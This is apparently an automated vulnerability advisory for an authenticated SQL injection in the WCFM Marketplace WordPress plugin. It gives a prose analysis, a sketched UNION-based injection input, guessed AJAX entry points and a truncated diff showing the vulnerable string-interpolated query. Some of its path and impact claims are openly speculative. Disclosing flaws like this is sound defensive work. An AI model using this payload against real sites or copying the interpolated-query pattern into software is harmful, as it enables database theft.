Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 26, 2026

CVE-2025-63029: WCFM Marketplace – Multivendor Marketplace for WooCommerce <= 3.7.1 – Authenticated (Store vendor+) SQL Injection (wc-multivendor-marketplace)

Severity Medium (CVSS 6.5)
CWE 89
Vulnerable Version 3.7.1
Patched Version 3.7.2
Disclosed April 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-63029:
This vulnerability allows authenticated attackers with store vendor-level access to perform SQL injection within the WCFM Marketplace plugin for WordPress, versions up to and including 3.7.1. The flaw resides in the lack of proper escaping and parameterized queries when handling user-supplied input, enabling attackers to append arbitrary SQL to existing queries and extract sensitive database information.

The root cause is that `wcfmmp_vendor_order_status_condition()` in `/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php` builds its SQL fragment by string interpolation. In the vulnerable code shown in the diff below, `$status` is a comma-joined, pre-quoted list returned by `get_wcfm_marketplace_active_withdrwal_order_status_in_comma()` (extended with `, 'refunded'` on the reports pages) and is placed straight into `IN ({$status})`, together with the unvalidated `$table_handler` alias; neither goes through `$wpdb->prepare()`. The excerpt does not show where a vendor-controlled value enters that status list (an `order_status` request parameter is the probable path, but it is not confirmed here); any quote character that reaches it terminates the `IN` list and lets the remainder of the input execute as SQL.

Exploitation requires an authenticated vendor-level account. The attacker supplies a value that closes the quoted `IN` list and appends a query of their own, for example `' UNION SELECT … --`, through an order-related request that ends up in the status list; candidates are the order status filters in the vendor dashboard and the `/wp-admin/admin-ajax.php` actions that reach `wcfmmp_vendor_order_status_condition()` via the `wcfm_order_status_condition` filter registered in the class constructor. The exact AJAX action name and parameter are not identified on this page, so a cURL request has to be built from the plugin's own handlers.

The fix ships in 3.7.2. The diff on this page is cut off before the added lines of its main hunk, so the patched body of `wcfmmp_vendor_order_status_condition()` is not visible here; the expected remedy is to validate each status against the plugin's allowed list and bind the values with `$wpdb->prepare()` (one `%s` placeholder per entry) instead of interpolating a pre-built `'a', 'b'` string, and to restrict `$table_handler` to the known table aliases. Before the patch, the status string was concatenated directly into the SQL fragment; after it, input must be either validated against an allowed list or passed as bound parameters, which closes the injection.

The impact of successful exploitation is disclosure of database contents reachable from a vendor session: an attacker can read other vendors' commission records and, with a UNION payload, user credentials (password hashes), session tokens and other confidential data, which can be leveraged toward privilege escalation, account takeover or wider compromise of the site. The Medium (6.5) rating reflects that a vendor account is required and that the flaw reads data rather than modifying it; it does not mean the data exposed is unimportant.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php
+++ b/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * WCFMmp plugin core
  *
@@ -8,2753 +9,2810 @@
  * @package 	wcfmmp/core
  * @version   1.0.0
  */
-
+
 class WCFMmp_Vendor {
-
-	public function __construct() {
-		global $WCFM;
-
-		if( !wcfm_is_vendor() ) {
-			// Vendor Listing Page
-			add_filter( 'wcfm_vendors_display_name_data', array( &$this, 'wcfmmp_vendors_listing_profile_info' ), 50, 2 );
-
-			// Vendor Details Page - Store Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_marketplace_setting' ) );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_marketplace_setting' ) );
-
-			// Vendor Details Page - Store Shiping Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_shipping_setting' ), 12 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_shipping_setting' ), 12 );
-
-			// Vendor Details Page - Store Cimmission & Withdrawal Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_commission_setting' ), 13 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_commission_setting' ), 13 );
-
-			// Vendor Details Page - Store Hours & Vacation Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_hours_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_hours_setting' ), 14 );
-
-			// Vendor Details Page - Store SEO & Social Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_seo_social_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_seo_social_setting' ), 14 );
-
-			// Vendor Details Page - Store Policies & Customer Support Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_policy_support_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_policy_support_setting' ), 14 );
-
-			// Vendor Manager Order
-			add_action( 'after_wcfm_vendor_direct_message_details', array( &$this, 'wcfmmp_vendor_manage_orders' ), 50, 2 );
-
-			// Bullk Store Assign
-			add_action( 'woocommerce_product_bulk_edit_end', array( &$this, 'wcfmmp_bulk_store_edit' ) );
-			add_action( 'wcfm_product_bulk_edit_end', array( &$this, 'wcfmmp_bulk_store_edit' ) );
-			add_action( 'woocommerce_product_bulk_edit_save', array( &$this, 'wcfmmp_bulk_store_edit_save' ) );
-			add_action( 'wcfm_product_bulk_edit_save', array( &$this, 'wcfmmpu_bulk_store_edit_save' ), 10, 2 );
-		}
-
-		// Vendor Profile Additional Info
-		if( apply_filters( 'wcfmmp_is_allow_manage_registration_additional_infos', true ) ) {
-			if( wcfm_is_vendor() ) {
-				add_action( 'end_wcfm_user_profile', array( &$this, 'wcfmmp_profile_additional_info' ), 75 );
-			}
-			add_action( 'after_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_profile_additional_info' ), 12 );
-			add_action( 'wcfm_profile_update', array( &$this, 'wcfmmp_profile_additional_info_update' ), 75, 2 );
-			add_action( 'wcfm_vendor_manage_profile_update', array( &$this, 'wcfmmp_profile_additional_info_update' ), 75, 2 );
-		}
-
-		// wePOS Compatibility
-		add_filter( 'wepos_frontend_permissions', array( &$this, 'wcfmmp_is_allow_wepos' ), 50 );
-		add_filter( 'wepos_rest_manager_permissions', array( &$this, 'wcfmmp_is_allow_wepos' ), 50 );
-		add_filter( 'woocommerce_rest_check_permissions', array( &$this, 'wcfmmp_is_allow_wepos_rest_check_permissions' ), 50, 4 );
-		add_filter( 'woocommerce_rest_product_object_query', array( &$this, 'wcfmmp_wepos_product_query' ), 50, 2 );
-
-		// Enable Vendor Order Email Notification
-		//add_filter( 'wcfm_is_allow_order_notification_email', array( &$this, 'wcfmmp_is_allow_order_notification_email' ) );
-
-		// Vendor Withdrawal Request Auto Apptove
-		add_filter( 'wcfmmp_is_withdrawal_auto_approve', array( &$this, 'wcfmmp_is_vendor_withdrawal_auto_approve' ), 10, 2 );
-
-		// Vendor Withdrawal Limit
-		add_filter( 'wcfmmp_withdrawal_limit', array( &$this, 'wcfmmp_vendor_withdrawal_limit' ), 10, 2 );
-
-		// Vendor Withdrawal Thresold
-		add_filter( 'wcfmmp_withdrawal_thresold', array( &$this, 'wcfmmp_vendor_withdrawal_thresold' ), 10, 2 );
-
-		// Vendor Withdrawal Charges
-		add_filter( 'wcfmmp_withdrawal_charges', array( &$this, 'wcfmmp_charges_withdrawal_charges' ), 10, 3 );
-
-		// Modify Vendor Order Status List
-		add_filter( 'wcfm_allowed_order_status',  array( &$this, 'wcfmmp_allowed_order_status' ) );
-
-		// Vendor Order Current Status
-		add_filter( 'wcfm_current_order_status', array( &$this, 'wcfmmp_vendor_current_order_status' ), 10, 2 );
-
-		// Vendor Order Status Condition Check
-		add_filter( 'wcfm_order_status_condition', array( &$this, 'wcfmmp_vendor_order_status_condition' ), 10, 2 );
-
-		// Sold By label
-		add_filter( 'wcfm_sold_by_label', array( &$this, 'sold_by_label' ), 10, 2 );
-
-		// Vendor Order Status change enable
-		add_filter( 'wcfm_is_allow_order_status_change_active', array( &$this, 'wcfmmp_is_allow_order_status_change_active' ), 10, 3 );
-
-		// Modify Vendor Orders Menu
-		add_filter( 'wcfmu_orders_menus',  array( &$this, 'wcfmmp_orders_menus' ) );
-
-		// Vendor order item repair
-		add_action( 'wcfm_order_repair_order_item', array( &$this, 'wcfmmp_order_repair_order_item' ) );
-
-		// Vendor Details In Order Eamail
-		if( apply_filters( 'wcfm_is_allow_policy_under_order_details', true ) ) {
-			add_action( 'woocommerce_order_details_after_order_table', array( &$this, 'wcfmmp_vendor_details_in_order' ), 20, 4 );
-		}
-		if( apply_filters( 'wcfm_is_allow_policy_under_order_emails', true ) ) {
-			add_action( 'woocommerce_email_order_meta', array( &$this, 'wcfmmp_vendor_details_in_order' ), 20, 4 );
-		}
-
-		// Store Info In Order Details Item
-		add_action( 'woocommerce_display_item_meta', array( &$this, 'wcfmmp_order_item_meta_store' ), 10, 3 );
-
-		// Store Off Line Store List Action
-		add_filter( 'wcfm_vendors_actions', array( &$this, 'wcfmmp_vendors_actions' ), 50, 2 );
-
-		// Store Purchase Disable if Store Offline
-		add_filter( 'woocommerce_is_purchasable', array( &$this, 'wcfmmp_product_store_is_offline' ), 750, 2 );
-		add_action( 'woocommerce_single_product_summary', array( &$this, 'wcfmmp_product_store_is_offline_addtocart_disable' ), 29 );
-
-		// Load Vendor Store Setup widget on first login
-		add_action( 'template_redirect', array( &$this, 'wcfmmp_store_setup_on_first_login' ), 750 );
-
-		// Vendor Profile complete percent
-		add_action( 'before_wcfm_marketplace_settings', array( &$this, 'wcfmmp_vendor_profile_complete_percent' ) );
-
-		// Vendor Product Archives for Disable or Offline Store
-		add_action( 'wcfm_vendor_disable_after', array( &$this, 'wcfmmp_vendor_product_offline' ) );
-		add_action( 'wcfm_store_offline_after', array( &$this, 'wcfmmp_vendor_product_offline' ) );
-
-		// Vendor Product Enable for Enable or Online Store
-		add_action( 'wcfm_vendor_enable_after', array( &$this, 'wcfmmp_vendor_product_online' ) );
-		add_action( 'wcfm_store_online_after', array( &$this, 'wcfmmp_vendor_product_online' ) );
-
-		// Product Stock Notification
-		add_filter( 'woocommerce_email_recipient_low_stock', array( &$this, 'wcfmmp_vendor_product_stock_notification' ), 50, 2 );
-		add_filter( 'woocommerce_email_recipient_no_stock', array( &$this, 'wcfmmp_vendor_product_stock_notification' ), 50, 2 );
-
-		// Radius Search User Query
-		add_action( 'pre_user_query', array( &$this, 'wcfmmp_pre_user_radius_query' ), 50 );
-
-		// Multiple Vendors Prdocuct Checkout Validation
-		add_action( 'woocommerce_add_to_cart_validation', array( &$this, 'wcfmmp_multivendor_order_validation' ), 500, 3 );
-
-		// Multiple Vendors YITH Request a Quote Restriction
-		if( apply_filters( 'wcfm_is_allow_multivendor_request_quote_validation', true ) ) {
-			add_filter( 'ywraq_ajax_add_item_is_valid', array( &$this, 'wcfmmp_multivendor_request_quote_validation' ), 500, 2 );
-		}
-
-		// On Product Delete Reset Store Taxonomy
-		add_action( 'delete_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-		add_action( 'wp_trash_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-		add_action( 'before_delete_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-
-	}
-
-	public function get_vendor_name_position( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$global_store_name_position = isset( $WCFMmp->wcfmmp_marketplace_options['store_name_position'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_name_position'] : 'on_banner';
-		$store_name_position = isset( $vendor_data['store_name_position'] ) ? esc_attr( $vendor_data['store_name_position'] ) : $global_store_name_position;
-		return $store_name_position;
-	}
-
-	/**
-	 * Return is show store sidebar
-	 * @return boolean
-	 */
-	public function is_store_sidebar() {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$store_sidebar = isset( $wcfmmp_marketplace_options['store_sidebar'] ) ? $wcfmmp_marketplace_options['store_sidebar'] : 'yes';
-		if( $store_sidebar == 'yes' ) return apply_filters( 'wcfmmp_is_store_sidebar', true );
-		return apply_filters( 'wcfmmp_is_store_sidebar', false );
-	}
-
-	/**
-	 * Return is show store list sidebar
-	 * @return boolean
-	 */
-	public function is_store_lists_sidebar() {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$store_list_sidebar = isset( $wcfmmp_marketplace_options['store_list_sidebar'] ) ? $wcfmmp_marketplace_options['store_list_sidebar'] : 'no';
-		if( $store_list_sidebar == 'yes' ) return apply_filters( 'wcfmmp_is_store_lists_sidebar', true );
-		return apply_filters( 'wcfmmp_is_store_lists_sidebar', false );
-	}
-
-	/**
-	 * Return is show sold by label
-	 * @return boolean
-	 */
-	public function is_vendor_sold_by( $vendor_id = '' ) {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$vendor_sold_by = isset( $wcfmmp_marketplace_options['vendor_sold_by'] ) ? $wcfmmp_marketplace_options['vendor_sold_by'] : 'yes';
-		if( $vendor_sold_by == 'yes' ) {
-			if( !$vendor_id || ( $vendor_id && apply_filters( 'wcfmmp_is_allow_sold_by', true, $vendor_id ) && wcfm_vendor_has_capability( $vendor_id, 'sold_by' ) ) ) {
-				return true;
-			} else {
-				return false;
-			}
-		}
-		return false;
-	}
-
-	public function get_vendor_sold_by_template() {
-		global $WCFM, $WCFMmp;
-		$vendor_sold_by_template = isset( $WCFMmp->wcfmmp_marketplace_options['vendor_sold_by_template'] ) ? $WCFMmp->wcfmmp_marketplace_options['vendor_sold_by_template'] : 'advanced';
-		return $vendor_sold_by_template;
-	}
-
-	public function sold_by_label( $vendor_id = '', $sold_by_text = '' ) {
-		global $WCFM, $WCFMmp;
-
-		$sold_by_label = isset( $WCFMmp->wcfmmp_marketplace_options['sold_by_label'] ) ? $WCFMmp->wcfmmp_marketplace_options['sold_by_label'] : __('Store', 'wc-multivendor-marketplace');
-
-		if( $vendor_id ) {
-			$vendor_capability_options = (array) apply_filters( 'wcfmgs_user_capability', get_option( 'wcfm_capability_options' ), $vendor_id );
-			$sold_by_label             = ( isset( $vendor_capability_options['sold_by_label'] ) ) ? $vendor_capability_options['sold_by_label'] : $sold_by_label;
-		}
-
-		if( !$sold_by_label ) $sold_by_label = __('Store', 'wc-multivendor-marketplace');
-
-		return apply_filters( 'wcfmmp_sold_by_label', $sold_by_label, $vendor_id );
-	}
-
-	/**
-	 * Return vendor's payment method
-	 */
-	public function get_vendor_payment_method( $vendor_id = 0 ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$payment_method = isset( $vendor_data['payment']['method'] ) ? esc_attr( $vendor_data['payment']['method'] ) : '' ;
-		return $payment_method;
-	}
-
-	/**
-	 * Return vendor's Payment Email
-	 */
-	public function get_vendor_payment_account( $vendor_id = 0, $account = 'paypal' ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$account_email = isset( $vendor_data['payment'][$account]['email'] ) ? esc_attr( $vendor_data['payment'][$account]['email'] ) : '' ;
-		return $account_email;
-	}
-
-	/**
-	 * Return vendor's Bank Detais
-	 */
-	public function get_vendor_bank_details( $vendor_id = 0 ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$bank_details = isset( $vendor_data['payment']['bank'] ) ? $vendor_data['payment']['bank'] : array();
-		return $bank_details;
-	}
-
-	public function wcfmmp_get_vendor_billing_details( $vendor_id, $billing_option ) {
-
-  	if( !$vendor_id ) return;
-  	if( !$billing_option ) return;
-
-  	if( $billing_option == 'bank_transfer' ) $billing_option = 'bank';
-
-  	$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-  	if( !$vendor_data ) $vendor_data = array();
-
-  	$billing_details  = isset( $vendor_data['payment'][$billing_option] ) ? $vendor_data['payment'][$billing_option] : array();
-  	$billing_details  = implode( ", ", $billing_details );
-
-  	return $billing_details;
-  }
-
-	/**
-	 * Enable New Order Email Notification to Vendors
-	 */
-	function wcfmmp_is_allow_order_notification_email( $is_allow ) {
-		return true;
-	}
-
-	/**
-	 * Vendor Withdrawal Request Auto Approve
-	 */
-	function wcfmmp_is_vendor_withdrawal_auto_approve( $is_auto_approve, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$is_auto_approve = isset( $vendor_data['withdrawal']['request_auto_approve'] ) ? $vendor_data['withdrawal']['request_auto_approve'] : 'no';
-				if( $is_auto_approve == 'yes' ) $is_auto_approve = true;
-				else $is_auto_approve = false;
-			}
-		}
-		return $is_auto_approve;
-	}
-
-	/**
-	 * Vendor Withdrawal Limit
-	 */
-	function wcfmmp_vendor_withdrawal_limit( $withdrawal_limit, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$withdrawal_limit = isset( $vendor_data['withdrawal']['withdrawal_limit'] ) ? $vendor_data['withdrawal']['withdrawal_limit'] : 0;
-			}
-		}
-		return $withdrawal_limit;
-	}
-
-	/**
-	 * Vendor Withdrawal Thresold
-	 */
-	function wcfmmp_vendor_withdrawal_thresold( $withdrawal_thresold, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$withdrawal_thresold = isset( $vendor_data['withdrawal']['withdrawal_thresold'] ) ? $vendor_data['withdrawal']['withdrawal_thresold'] : '';
-			}
-		}
-		return $withdrawal_thresold;
-	}
-
-	/**
-	 * Vendor Withdrawal Charges
-	 */
-	function wcfmmp_charges_withdrawal_charges( $withdrawal_charges, $amount, $vendor_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( $vendor_id && $amount ) {
-			$payment_method = $WCFMmp->wcfmmp_vendor->get_vendor_payment_method( $vendor_id );
-			if( $payment_method ) {
-				if ( array_key_exists( $payment_method, $WCFMmp->wcfmmp_gateways->payment_gateways ) ) {
-					$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-					$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-					if( $vendor_withdrawal_mode != 'global' ) {
-
-						$withdrawal_charge_type = isset( $vendor_data['withdrawal']['withdrawal_charge_type'] ) ? $vendor_data['withdrawal']['withdrawal_charge_type'] : 'no';
-
-						$vendor_withdrawal_charge   = isset( $vendor_data['withdrawal']['withdrawal_charge'] ) ? $vendor_data['withdrawal']['withdrawal_charge'] : array();
-						$withdrawal_charge_gateway  = isset( $vendor_withdrawal_charge[$payment_method] ) ? $vendor_withdrawal_charge[$payment_method][0] : array();
-						$withdrawal_percent_charge  = isset( $withdrawal_charge_gateway['percent'] ) ? $withdrawal_charge_gateway['percent'] : 0;
-						$withdrawal_fixed_charge    = isset( $withdrawal_charge_gateway['fixed'] ) ? $withdrawal_charge_gateway['fixed'] : 0;
-						$withdrawal_charge_tax      = isset( $withdrawal_charge_gateway['tax'] ) ? $withdrawal_charge_gateway['tax'] : 0;
-
-						switch( $withdrawal_charge_type ) {
-							case 'no':
-								$withdrawal_charges = 0;
-							break;
-
-							case 'fixed':
-								$withdrawal_charges = (float) $withdrawal_fixed_charge;
-							break;
-
-							case 'percent':
-								$withdrawal_charges = (float) $amount * ( (float) $withdrawal_percent_charge/100 );
-							break;
-
-							case 'percent_fixed':
-								$withdrawal_charges  = (float) $amount * ( (float) $withdrawal_percent_charge/100 );
-								$withdrawal_charges += (float) $withdrawal_fixed_charge;
-							break;
-
-							default:
-								$withdrawal_charges = 0;
-							break;
-						}
-
-						if( $withdrawal_charges && $withdrawal_charge_tax ) {
-							$withdrawal_tax      = (float) $withdrawal_charges * ( (float) $withdrawal_charge_tax/100 );
-							$withdrawal_charges += (float) $withdrawal_tax;
-						}
-
-						if( $withdrawal_charges ) {
-							$withdrawal_charges = round( $withdrawal_charges, 2 );
-						}
-					}
-				}
-			}
-		}
-		return $withdrawal_charges;
-
-	}
-
-	/**
-	 * Modify Vendor's order status list
-	 */
-	function wcfmmp_allowed_order_status( $order_status ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( wcfm_is_vendor() ) {
-			if( WCFMmp_Dependencies::wcfm_plugin_active_check() && WCFM_Dependencies::wcfmu_plugin_active_check() ) {
-				if( apply_filters( 'wcfm_is_pref_shipment_tracking', true ) && apply_filters( 'wcfm_is_allow_shipping_tracking', true ) ) {
-					$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-					$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-					if( $order_sync != 'yes' ) {
-						$order_vendor_status = apply_filters( 'wcfmmp_vendor_order_status',
-																									array(
-																										'wc-shipped' => __( 'Shipped', 'wc-multivendor-marketplace' )
-																										)
-																								);
-						$order_status = array_merge( $order_status, $order_vendor_status );
-					}
-				}
-			}
-
-			if( !apply_filters( 'wcfm_is_allow_refund_requests', true ) ) {
-				if( isset( $order_status['wc-refunded'] ) ) unset( $order_status['wc-refunded'] );
-			}
-			if( isset( $order_status['wc-cancelled'] ) ) unset( $order_status['wc-cancelled'] );
-			if( isset( $order_status['wc-failed'] ) ) unset( $order_status['wc-failed'] );
-		}
-		return $order_status;
-	}
-
-	/**
-	 * Return vendor order current status
-	 */
-	function wcfmmp_vendor_current_order_status( $order_status, $order_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-		if( $order_sync != 'yes' ) {
-			if( wcfm_is_vendor() ) {
-				$vendor_id = $WCFMmp->vendor_id;
-				$sql = 'SELECT order_status, GROUP_CONCAT(commission_status) commission_statuses, GROUP_CONCAT(is_refunded) is_refundeds, GROUP_CONCAT(refund_status) refund_statuses  FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-				$sql .= ' WHERE 1=1';
-				$sql .= " AND `order_id` = %d";
-				$sql .= " AND `vendor_id` = %d";
-				$commissions = $wpdb->get_results($wpdb->prepare($sql, [$order_id, $vendor_id]));
-				$product_id = 0;
-				if( !empty( $commissions ) ) {
-					foreach( $commissions as $commission ) {
-						$commission_statuses = explode( ",", $commission->commission_statuses );
-						$refund_statuses = explode( ",", $commission->refund_statuses );
-						$is_refundeds = explode( ",", $commission->is_refundeds );
-
-						$order_status = $commission_statuses[0];
-					}
-				}
-				return apply_filters( 'wcfmmp_vendor_current_order_status', $order_status, $order_id, $vendor_id );
-			}
-		}
-		return $order_status;
-	}
-
-	/**
-	 * Vendor Order Status Condition depending upon Order Sync Comdition
-	 */
-	function wcfmmp_vendor_order_status_condition( $condition, $table_handler ) {
-		global $WCFMmp, $WCFM_Query;
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-		$status = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
-
-		// Adding "refunded" status only for reports page
-		if ( ! is_null( $WCFM_Query ) && !is_admin() && is_page() && is_wcfm_page() ) {
-			$current_endpoint = $WCFM_Query->get_current_endpoint();
-			if( (wcfm_is_vendor() && !$current_endpoint) || in_array( $current_endpoint, array( 'wcfm-reports-sales-by-date', 'wcfm-reports-sales-by-vendor' ) ) ) {
-				$status .= ", 'refunded'";
-			}
-		}
-
-		if( $order_sync == 'yes' ) {
-		  $condition = " AND {$table_handler}.order_status IN ({$status})";
-		} else {
-			$condition = " AND {$table_handler}.commission_status IN ({$status})";
-		}
-		return $condition;
-	}
-
-	/**
-	 * Vendor Order Status Active
-	 */
-	function wcfmmp_is_allow_order_status_change_active( $is_allow, $order_id, $order ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$vendor_id = $WCFMmp->vendor_id;
-		if( wcfm_is_vendor() ) {
-			$sql = 'SELECT GROUP_CONCAT(commission_status) commission_statuses, GROUP_CONCAT(is_refunded) is_refundeds, GROUP_CONCAT(refund_status) refund_statuses  FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-			$sql .= ' WHERE 1=1';
-			$sql .= " AND `order_id` = %d";
-			$sql .= " AND `vendor_id` = %d";
-			$commissions = $wpdb->get_results( $wpdb->prepare( $sql, $order_id, $vendor_id ) );
-			$product_id = 0;
-			if( !empty( $commissions ) ) {
-				foreach( $commissions as $commission ) {
-
-					$commission_statuses = explode( ",", $commission->commission_statuses );
-					$refund_statuses = explode( ",", $commission->refund_statuses );
-					$is_refundeds = explode( ",", $commission->is_refundeds );
-
-					if( !in_array( 0, $is_refundeds ) ) $is_allow = 0;
-					if( in_array( 'requested', $refund_statuses ) ) $is_allow = 0;
-				}
-			}
-		}
-
-		return $is_allow;
-	}
-
-	/**
-	 * Modify Vendor's orders menu
-	 */
-	function wcfmmp_orders_menus( $order_menus ) {
-		if( wcfm_is_vendor() ) {
-			$order_vendor_menus = apply_filters( 'wcfmmp_vendor_order_menus',
-																						array(
-																							'pending' => __( 'Pending', 'wc-multivendor-marketplace' ),
-																							'shipped' => __( 'Shipped', 'wc-multivendor-marketplace' )
-																							)
-																					);
-			$order_menus = array_merge( $order_menus, $order_vendor_menus );
-			if( isset( $order_menus['cancelled'] ) ) unset( $order_menus['cancelled'] );
-			if( isset( $order_menus['failed'] ) ) unset( $order_menus['failed'] );
-		}
-		return $order_menus;
-	}
-
-	public function wcfmmp_vendor_order_status_name( $order_ststus ) {
-		$order_vendor_status = $this->wcfmmp_allowed_order_status( wc_get_order_statuses() );
-		if( isset( $order_vendor_status[$order_ststus] ) ) return $order_vendor_status[$order_ststus];
-		if( isset( $order_vendor_status['wc-'.$order_ststus] ) ) return $order_vendor_status['wc-'.$order_ststus];
-		return ucfirst( $order_ststus );
-	}
-
-	/**
-	 * Vendor Order invalid item repair
-	 */
-	function wcfmmp_order_repair_order_item( $order_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$order = wc_get_order( $order_id );
-		if( !is_a( $order, 'WC_Order' ) ) return;
-
-		$items = $order->get_items( 'line_item' );
-    if( !empty( $items ) ) {
-			foreach( $items as $item_key => $item ) {
-				$order_item_id = $item_id = $item->get_id();
-				$line_item = new WC_Order_Item_Product( $item );
-				$product  = $line_item->get_product();
-				$product_id = $line_item->get_product_id();
-				$variation_id = $line_item->get_variation_id();
-
-				if( $product_id ) {
-					$vendor_id = wcfm_get_vendor_id_by_post( $product_id );
-
-					if( $vendor_id ) {
-						$wpdb->update("{$wpdb->prefix}wcfm_marketplace_orders", array('item_id' => $order_item_id, 'product_id' => $product_id, 'variation_id' => $variation_id, 'quantity' => $line_item->get_quantity(), 'product_price' => $product->get_price()), array('order_id' => $order_id, 'vendor_id' => $vendor_id), array('%d', '%d', '%d', '%d', '%s'), array('%d', '%d'));
-					}
-				}
-			}
-		}
-	}
-
-	/**
-	 * Vendor Listing profile inf0
-	 */
-	function wcfmmp_vendors_listing_profile_info( $wcfm_vendors_name, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$store_user  = wcfmmp_get_store( absint( $vendor_id ) );
-			$email       = $store_user->get_email();
-			$phone       = $store_user->get_phone();
-			$address     = $store_user->get_address_string();
-
-			$wcfm_vendors_name .= '<span style="color:#555;">';
-			if( $email ) $wcfm_vendors_name .= '<br /><span style="line-height:2em;"><i class="wcfmfa fa-at" aria-hidden="true" style="color:#20a8d8;vertical-align: middle;"></i> <span>' . $email . '</span></span>';
-			if( $phone ) $wcfm_vendors_name .= '<br /><span style="line-height:2em;"><i class="wcfmfa fa-phone" aria-hidden="true" style="color:#20a8d8;"></i> <span>' . $phone . '</span></span>';
-			if( $address ) $wcfm_vendors_name .= '<br /><span><i class="wcfmfa fa-map-marker" aria-hidden="true" style="color:#20a8d8;"></i> <span>' . $address . '</span></span>';
-			$wcfm_vendors_name .= '</span>';
-		}
-		return $wcfm_vendors_name;
-
-	}
-
-	/**
-	 * Vendor Store Setting
-	 */
